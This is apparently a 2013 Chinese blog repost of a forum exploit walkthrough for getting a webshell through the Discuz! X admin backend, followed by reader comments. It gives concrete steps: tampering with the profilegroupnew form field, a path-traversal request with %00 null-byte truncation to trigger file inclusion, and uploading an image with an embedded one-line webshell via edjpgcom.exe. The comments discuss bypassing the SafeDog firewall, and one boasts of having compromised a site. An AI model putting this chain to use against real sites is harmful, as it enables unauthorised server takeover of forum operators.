用户 - 用户栏目 - 栏目分组 抓包

Content-Disposition: form-data; name="settingnew[profilegroupnew][base][available]"

改为

Content-Disposition: form-data; name="settingnew[profilegroupnew][plugin][available]"

访问

/home.php?mod=spacecp&id=../../robots.txt%0057

dz x 后台怎么拿shell

虽然涉及0x00截断 但无视 GPC

source


zafe 发表于 2013-5-24 10:22

*********************************************************************

说下具体怎么利用

原帖测试的是dz x3,我测试的是dz x2.5  无视gpc

*********************************************************************

首先进后台,抓个包

dz x 后台拿shell

把这里

settingnew[profilegroupnew][base][available]

改成

settingnew[profilegroupnew][plugin][available]

提交

访问

/home.php?mod=spacecp&id=../../robots.txt%0057

dz x 后台拿shell

这里你要是天真的点保存就错了

其实这里是个包含漏洞(我也没看代码,猜的)

所以先用edjpgcom.exe合成了生成一句话的图片

dz x 后台拿shell

上传后找到路径

dz x 后台拿shell

当然改头像也可以

最后爆菊

dz x 后台拿shell

留言评论(旧系统):

安静的石头 @ 2013-05-24 11:02:47

昨天刚搞定了一个。嘿嘿。

本站回复:

恭喜恭喜!

佚名 @ 2013-05-24 17:26:10

请在这里填写留言内容,最长不超过 1000 字。

本站回复:

[暂无回复]

bean @ 2013-05-24 17:27:48

截断有限制没?是全版本漏洞?

本站回复:

具体不清楚

小样 @ 2013-05-25 10:07:52

windows截不了。。

本站回复:

╮(╯_╰)╭

佚名 @ 2013-05-26 12:00:19

这个 可以无视安全狗吗

本站回复:

自己试试不就知道了。

悟空 @ 2013-05-27 09:33:19

dz x 后台拿shell漏洞分析 http://p.t.qq.com/longweibo/index.php?lid=18419595405048586915

本站回复:

神经病 @ 2014-05-21 21:17:16

如果你能提供dz的官方论坛admin密码,我相信还是能测试成功的。

本站回复:

-_-|||